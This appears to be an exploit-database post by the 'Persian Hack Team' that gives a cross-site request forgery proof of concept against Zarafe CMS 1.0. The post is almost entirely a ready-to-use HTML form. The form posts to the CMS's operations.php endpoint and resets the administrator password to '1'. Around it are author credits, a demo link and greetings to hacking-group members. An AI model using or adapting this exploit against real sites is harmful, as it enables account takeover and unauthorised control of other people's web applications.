###################### # Exploit Title : Zarafe CMS 1.0 / CSRF (Rest Admin Password) # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.zarrafeh.net/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 1.0 # Date: 2016/08/27 ###################### # # PoC: Exploit code(s): ================ Rest Admin Password The Code for zarafe.html is <h1 align="Center"> Zarafe CMS CSRF (Rest Admin Password)</h1> <h1 align="Center"> Persian Hack Team </h1> <h1 align="Center"> Discover By Mojtaba MobhaM </h1> <form action="http://target.com/zpanel/includes/operations.php" method="post" name="frm_settings" target="operations"> <table align="center" cellpadding="3px" width="40%" border="1"> <tr> <td align="left" valign="top" width="140px" nowrap="nowrap"></td><td><input name="username" type="text" style="width:100%;" value="admin" /></td> </tr> <tr> <td align="left" valign="top" nowrap="nowrap"></td><td><input name="password" type="password" style="width:100%;" value="1" /> value=1</td> </tr> <tr> <td align="left" valign="top" nowrap="nowrap"></td><td><input name="password_repeat" type="password" style="width:100%;" value="1"/> value=1</td> </tr> <tr> <td></td><td><input name="btn_submit_settings" type="submit" value="EXP" /></td> </tr> </table> </form> #Youtube Demo : https://www.youtube.com/watch?v=7JIYTaAiMig ###################### # Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members # Homepage : persian-team.ir ######################